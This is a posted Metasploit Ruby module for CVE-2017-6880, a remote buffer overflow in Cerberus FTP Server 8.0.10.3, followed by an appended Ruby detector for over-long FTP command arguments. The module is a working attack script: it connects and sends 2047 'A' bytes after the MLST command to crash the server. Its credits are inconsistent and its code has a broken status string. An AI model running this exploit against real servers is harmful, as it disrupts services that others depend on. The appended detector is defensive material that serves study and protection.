
Cerberus FTP 8.0.10.3 MLST Buffer Overflow

Posted on 16 May 2017

#!/usr/share/ruby
#[+] Title: Cerberus FTP Server 8.0.10.3 - 'MLST' Remote Buffer Overflow
#[+] Credits / Discovery: Nassim Asrir
#[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
#[+] Metasploit Module Author : Souhardya Sardar
#[+] Metasploit Module Author Contact: github.com/Souhardya | Souhardya.sardar@protonmail.com
#[+] Author Company: Henceforth
#[+] CVE: CVE-2017-6880
#Vendor:
#===============
#
#https://www.cerberusftp.com/
#Download:
#===========
#
#https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
#Vulnerability Type:
#===================
#
#Remote Buffer Overflow.

# ----------------------------
# Module Dependencies/requires
# ----------------------------
require 'msf/core'

# ----------------------------------
# Metasploit Class name and includes
# ----------------------------------
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp

  # -----------------------------------------
  # Initialize information
  # -----------------------------------------
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Cerber FTP Remote Buffer Overflow ',
      'Description' => %q{
        This module exploits a buffer overflow in the Cerber FTP client that is triggered
        by sending a bad char "A" in the command "MLST" (2047) .
      },
      'Author'      =>
        [
          'Module Author And Bug Discovered by : Peter Baris',
          'Coded by : Souhardya Sardar (github.com/Souhardya)', #metasploit module :)
          'Thanks to : Nidhish Pandya ', #auditing:)
        ],
      # Author's value; Metasploit itself defines license constants such as MSF_LICENSE.
      'License'     => NONE,
      'Platform'    => ['win'],
      'References'  =>
        [
          [ 'CVE', 'CVE-2017-6880' ],
          # Reference code taken from original POC located here:
          [ 'URL', 'https://www.exploit-db.com/exploits/41620/' ]
        ]))

    register_options(
      [
        OptPort.new('SRVPORT', [true, "The remote FTP server port", 21])
      ], self.class)

    deregister_options('FTPUSER', 'FTPPASS')
  end

  def exploit
    connect

    # 2047 bytes of "A" as the MLST argument; no shellcode is delivered.
    payload = "A"*2047

    print_status("Trying to connect to target server {target.name...")

    sock.put('MLST ' + payload + ' ')

    handler
    disconnect
  end
end
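
Added example, not part of the original post or the module above: a Ruby check a defender could run over captured FTP control-channel bytes to flag the over-long MLST argument this module sends. The 512-byte limit, the names scan_ftp_stream and Finding, and the sample session are assumptions constructed for illustration.

```ruby
# Flags over-long FTP command arguments in captured control-channel bytes.
# Added example: the limit, names and sample data below are assumptions.
MAX_ARG_BYTES = 512 # assumed policy limit; tune per environment

Finding = Struct.new(:verb, :arg_len, :terminated, :filler)

# Share of the argument taken by its most frequent byte (1.0 = pure filler).
def filler_ratio(arg)
  return 0.0 if arg.empty?
  (arg.each_byte.tally.values.max.to_f / arg.bytesize).round(2)
end

# Splits a raw client-to-server byte stream into FTP commands and returns a
# Finding for every command whose argument exceeds max_arg bytes.
# A trailing fragment without CRLF is inspected too, because an oversized
# command can be captured before (or without) its line terminator.
def scan_ftp_stream(raw, max_arg: MAX_ARG_BYTES)
  data = raw.dup.force_encoding(Encoding::BINARY)
  lines = data.split("\r\n", -1)
  tail = lines.pop # "" when the stream ended on CRLF, nil when empty
  entries = lines.map { |l| [l, true] }
  entries << [tail, false] unless tail.nil? || tail.empty?

  entries.filter_map do |line, terminated|
    verb, arg = line.split(" ", 2) # FTP verbs are case-insensitive
    next if verb.nil?
    arg ||= ""
    next if arg.bytesize <= max_arg
    Finding.new(verb.upcase, arg.bytesize, terminated, filler_ratio(arg))
  end
end

# Constructed sample session (not taken from a real capture).
SAMPLE = [
  "USER anonymous",
  "PASS guest@example.invalid",
  "MLST /pub/readme.txt",
  "mlst " + ("A" * 2047) + " ",
  "NOOP"
].map { |l| l + "\r\n" }.join

if __FILE__ == $PROGRAM_NAME
  scan_ftp_stream(SAMPLE).each do |f|
    puts "ALERT verb=#{f.verb} arg_len=#{f.arg_len} " \
         "terminated=#{f.terminated} filler=#{f.filler}"
  end
end
```

The filler value helps triage: a value near 1.0 means the argument is almost entirely one repeated byte rather than a plausible path.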

 
